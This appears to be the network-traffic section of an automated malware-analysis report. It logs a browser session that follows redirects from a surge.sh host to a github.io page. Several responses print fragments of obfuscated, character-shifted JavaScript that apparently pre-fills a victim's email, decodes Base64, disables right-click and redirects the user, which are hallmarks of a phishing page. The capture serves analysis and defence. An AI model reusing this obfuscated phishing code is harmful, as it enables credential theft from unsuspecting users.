                                                                                                                                                                                                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:36 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 24490
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:37 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:37 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          5192.168.2.749730188.166.132.944435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:50 UTC865OUTGET /3p71OSuGgCok6FO7ZFUhEbb2gK9ZxuYZxdl2y8HSfVs0EX73KA1HgLgJ27HZhYYVRvyXf0wdADRdJRXB50aRUURx9Hm30U2w0fTUESK7HdbXMKiz1Lr9qbxMGWIab3H6h21Ta7aoVRUAo0LiDrfvUQsQM5QvPwbYFfyuMm64auSaaWLktuJtAYtcI5O7E95y0ss HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: equable-toothpaste.surge.sh
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:50 UTC385INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                          Server: Surge
                                                                                                                                                                                                                                                                                          Surge-Cache: HIT
                                                                                                                                                                                                                                                                                          Surge-Stamp: 1086::1726703439459
                                                                                                                                                                                                                                                                                          Location: /3p71OSuGgCok6FO7ZFUhEbb2gK9ZxuYZxdl2y8HSfVs0EX73KA1HgLgJ27HZhYYVRvyXf0wdADRdJRXB50aRUURx9Hm30U2w0fTUESK7HdbXMKiz1Lr9qbxMGWIab3H6h21Ta7aoVRUAo0LiDrfvUQsQM5QvPwbYFfyuMm64auSaaWLktuJtAYtcI5O7E95y0ss/
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:50 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          6192.168.2.749731188.166.132.944435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:50 UTC866OUTGET /3p71OSuGgCok6FO7ZFUhEbb2gK9ZxuYZxdl2y8HSfVs0EX73KA1HgLgJ27HZhYYVRvyXf0wdADRdJRXB50aRUURx9Hm30U2w0fTUESK7HdbXMKiz1Lr9qbxMGWIab3H6h21Ta7aoVRUAo0LiDrfvUQsQM5QvPwbYFfyuMm64auSaaWLktuJtAYtcI5O7E95y0ss/ HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: equable-toothpaste.surge.sh
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:50 UTC439INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: Surge
                                                                                                                                                                                                                                                                                          Surge-Cache: HIT
                                                                                                                                                                                                                                                                                          Surge-Stamp: 1114::1726703439459-c2eee6ad8d864079cfb48882a5d11a9a
                                                                                                                                                                                                                                                                                          Age: 22015
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:50 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                          ETag: "bb19153bda63b1ff31517257aa39574dc69e8dc0527cb4e8ad37e521b084aa83"
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Response-Time: 1ms
                                                                                                                                                                                                                                                                                          Content-Length: 1417
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:50 UTC1417INData Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 6a 61 76 61 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 36 43 25 36 31 25 36 45 25 36 37 25 37 35 25 36 31 25 36 37 25 36 35 25 33 44 25 32 32 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 36 36 25 37 35 25 36 45 25 36 33 25 37 34 25 36 39 25 36 46 25 36 45 25 32 30 25 36 34 25 34 36 25 32 38 25 37 33 25 32 39 25 37 42 25 37 36 25 36 31 25 37 32 25 32 30 25 37 33 25 33 31 25 33 44 25 37 35 25 36 45 25 36 35 25 37 33 25 36 33 25 36 31 25 37 30 25 36 35 25 32 38 25 37 33 25 32 45 25 37 33 25 37 35 25 36 32 25 37 33 25
                                                                                                                                                                                                                                                                                          Data Ascii: <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          7192.168.2.749733185.199.110.1534435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC703OUTGET /feel1 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sharedfiles2.github.io
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          Referer: https://equable-toothpaste.surge.sh/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC546INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                                                                          Server: GitHub.com
                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                          permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                                                                          Location: https://sharedfiles2.github.io/feel1/
                                                                                                                                                                                                                                                                                          X-GitHub-Request-Id: 4EB1:2A290C:BAED84:CD02AC:66F6C3F3
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:51 GMT
                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                          X-Served-By: cache-ewr-kewr1740076-EWR
                                                                                                                                                                                                                                                                                          X-Cache: MISS
                                                                                                                                                                                                                                                                                          X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                          X-Timer: S1727448051.399734,VS0,VE12
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Fastly-Request-ID: de220d96c225232ec936dc1b3e43f45c3d8a2016
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          8192.168.2.749734185.199.110.1534435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC704OUTGET /feel1/ HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sharedfiles2.github.io
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Referer: https://equable-toothpaste.surge.sh/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 10466
                                                                                                                                                                                                                                                                                          Server: GitHub.com
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                          permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Sep 2024 21:01:34 GMT
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                                                                          ETag: "66ede2ae-28e2"
                                                                                                                                                                                                                                                                                          expires: Fri, 27 Sep 2024 14:50:51 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: max-age=600
                                                                                                                                                                                                                                                                                          x-proxy-cache: MISS
                                                                                                                                                                                                                                                                                          X-GitHub-Request-Id: 9267:1AA455:C8486B:DA5E91:66F6C3F3
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:51 GMT
                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                          X-Served-By: cache-ewr-kewr1740062-EWR
                                                                                                                                                                                                                                                                                          X-Cache: MISS
                                                                                                                                                                                                                                                                                          X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                          X-Timer: S1727448052.512178,VS0,VE29
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Fastly-Request-ID: e1a50d954523864b418cda5d29321100717726fe
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC1378INData Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 6a 61 76 61 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 36 43 25 36 31 25 36 45 25 36 37 25 37 35 25 36 31 25 36 37 25 36 35 25 33 44 25 32 32 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 36 36 25 37 35 25 36 45 25 36 33 25 37 34 25 36 39 25 36 46 25 36 45 25 32 30 25 36 34 25 34 36 25 32 38 25 37 33 25 32 39 25 37 42 25 37 36 25 36 31 25 37 32 25 32 30 25 37 33 25 33 31 25 33 44 25 37 35 25 36 45 25 36 35 25 37 33 25 36 33 25 36 31 25 37 30 25 36 35 25 32 38 25 37 33 25 32 45 25 37 33 25 37 35 25 36 32 25 37 33 25
                                                                                                                                                                                                                                                                                          Data Ascii: <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC1378INData Raw: 37 35 69 6e 78 75 71 66 25 37 45 2a 38 46 2a 37 35 6b 71 6a 25 37 44 2a 38 47 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 6b 71 6a 25 37 44 32 69 6e 77 6a 68 79 6e 74 73 2a 38 46 2a 37 35 68 74 71 7a 72 73 2a 38 47 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 66 71 6e 6c 73 32 6e 79 6a 72 78 2a 38 46 2a 37 35 68 6a 73 79 6a 77 2a 38 47 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 6f 7a 78 79 6e 6b 25 37 45 32 68 74 73 79 6a 73 79 2a 38 46 2a 37 35 68 6a 73 79 6a 77 2a 38 47 2a 37 35 34 2f 2a 37 35 48 6a 73 79 6a 77 2a 37 35 68 74 73 79 6a 73
                                                                                                                                                                                                                                                                                          Data Ascii: 75inxuqf%7E*8F*75kqj%7D*8G*5F*75*75*75*75*75*75*75*75*75*75*75*75kqj%7D2inwjhynts*8F*75htqzrs*8G*5F*75*75*75*75*75*75*75*75*75*75*75*75fqnls2nyjrx*8F*75hjsyjw*8G*5F*75*75*75*75*75*75*75*75*75*75*75*75ozxynk%7E2htsyjsy*8F*75hjsyjw*8G*754/*75Hjsyjw*75htsyjs
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC1378INData Raw: 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 72 66 77 6c 6e 73 32 79 74 75 2a 38 46 2a 37 35 36 77 6a 72 2a 38 47 2a 37 35 34 2f 2a 37 35 52 66 77 6c 6e 73 2a 37 35 6b 77 74 72 2a 37 35 79 6d 6a 2a 37 35 79 74 75 2a 37 35 2f 34 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 6b 74 73 79 32 78 6e 25 37 46 6a 2a 38 46 2a 37 35 36 77 6a 72 2a 38 47 2a 37 35 34 2f 2a 37 35 4b 7a 77 79 6d 6a 77 2a 37 35 77 6a 69 7a 68 6a 69 2a 37 35 6b 74 73 79 2a 37 35 78 6e 25 37 46 6a 2a 37 35 2f 34 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 68 74 71 74 77 2a 38 46 2a 37 35 2a 37 38 39 48 46 4b 25 33 41 35 2a 38
                                                                                                                                                                                                                                                                                          Data Ascii: 5*75*75*75*75*75*75*75rfwlns2ytu*8F*756wjr*8G*754/*75Rfwlns*75kwtr*75ymj*75ytu*75/4*5F*75*75*75*75*75*75*75*75*75*75*75*75ktsy2xn%7Fj*8F*756wjr*8G*754/*75Kzwymjw*75wjizhji*75ktsy*75xn%7Fj*75/4*5F*75*75*75*75*75*75*75*75*75*75*75*75htqtw*8F*75*789HFK%3A5*8
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC1378INData Raw: 66 73 78 71 66 79 6a 25 35 44 2a 37 25 33 44 32 25 33 41 35 2a 37 25 33 41 2a 37 25 33 45 2a 38 47 2a 37 35 34 2f 2a 37 35 48 6a 73 79 6a 77 2a 37 35 6d 74 77 6e 25 37 46 74 73 79 66 71 71 25 37 45 2a 37 35 2f 34 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 25 33 43 49 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 38 48 34 78 79 25 37 45 71 6a 2a 38 4a 2a 35 46 2a 38 48 34 6d 6a 66 69 2a 38 4a 2a 35 46 2a 38 48 67 74 69 25 37 45 2a 37 35 74 73 68 74 73 79 6a 25 37 44 79 72 6a 73 7a 2a 38 49 2a 37 37 77 6a 79 7a 77 73 2a 37 35 6b 66 71 78 6a 2a 38 47 2a 37 37 2a 38 4a 2a 37 35 2a 38 48 2a 37 36 32 32 2a 37 35 49 6e 78 66 67 71 6a 2a 37 35 77 6e 6c 6d 79 32 68 71 6e 68 70 2a 37 35 68 74 73 79 6a 25 37 44 79 2a 37 35
                                                                                                                                                                                                                                                                                          Data Ascii: fsxqfyj%5D*7%3D2%3A5*7%3A*7%3E*8G*754/*75Hjsyjw*75mtwn%7Ftsyfqq%7E*75/4*5F*75*75*75*75*75*75*75*75*%3CI*5F*75*75*75*75*8H4xy%7Eqj*8J*5F*8H4mjfi*8J*5F*8Hgti%7E*75tshtsyj%7Dyrjsz*8I*77wjyzws*75kfqxj*8G*77*8J*75*8H*7622*75Inxfgqj*75wnlmy2hqnhp*75htsyj%7Dy*75
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC1378INData Raw: 67 2a 37 25 33 44 6d 66 78 6d 2a 37 25 33 45 2a 38 47 2a 37 35 34 34 2a 37 35 49 6a 68 74 69 6a 2a 37 35 79 6d 6a 2a 37 35 47 66 78 6a 25 33 42 39 2a 37 35 78 79 77 6e 73 6c 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 77 6a 79 7a 77 73 2a 37 35 69 6a 68 74 69 6a 69 4d 66 78 6d 2a 38 47 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 25 33 43 49 2a 37 35 68 66 79 68 6d 2a 37 35 2a 37 25 33 44 6a 77 77 74 77 2a 37 25 33 45 2a 37 35 2a 25 33 43 47 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35
                                                                                                                                                                                                                                                                                          Data Ascii: g*7%3Dmfxm*7%3E*8G*7544*75Ijhtij*75ymj*75Gfxj%3B9*75xywnsl*5F*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75wjyzws*75ijhtijiMfxm*8G*5F*75*75*75*75*75*75*75*75*75*75*75*75*%3CI*75hfyhm*75*7%3Djwwtw*7%3E*75*%3CG*5F*75*75*75*75*75*75*75*75*75*75*75*75*75*75
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC1378INData Raw: 43 49 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 25 33 43 49 2a 35 46 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 34 34 2a 37 35 48 66 71 71 2a 37 35 79 6d 6a 2a 37 35 75 74 75 7a 71 66 79 6a 4a 72 66 6e 71 2a 37 35 6b 7a 73 68 79 6e 74 73 2a 37 35 25 37 43 6d 6a 73 2a 37 35 79 6d 6a 2a 37 35 75 66 6c 6a 2a 37 35 71 74 66 69 78 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 25 37 43 6e 73 69 74 25 37 43 33 74 73 71 74 66 69 2a 37 35 2a 38 49 2a 37 35 6b 7a 73 68 79 6e 74 73 2a 37 25 33 44 2a 37 25 33 45 2a 37 35 2a 25 33 43 47 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 79
                                                                                                                                                                                                                                                                                          Data Ascii: CI*5F*75*75*75*75*75*75*75*75*%3CI*5F*5F*75*75*75*75*75*75*75*7544*75Hfqq*75ymj*75utuzqfyjJrfnq*75kzshynts*75%7Cmjs*75ymj*75uflj*75qtfix*5F*75*75*75*75*75*75*75*75%7Cnsit%7C3tsqtfi*75*8I*75kzshynts*7%3D*7%3E*75*%3CG*5F*75*75*75*75*75*75*75*75*75*75*75*75y
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC1378INData Raw: 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 78 6a 79 59 6e 72 6a 74 7a 79 2a 37 25 33 44 6b 7a 73 68 79 6e 74 73 2a 37 25 33 44 2a 37 25 33 45 2a 37 35 2a 25 33 43 47 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 34 34 2a 37 35 57 6a 69 6e 77 6a 68 79 2a 37 35 79 6d 6a 2a 37 35 7a 78 6a 77 2a 37 35 79 74 2a 37 35 79 6d 6a 2a 37 35 78 75 6a 68 6e 6b 6e 6a 69 2a 37 35 5a 57 51 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a
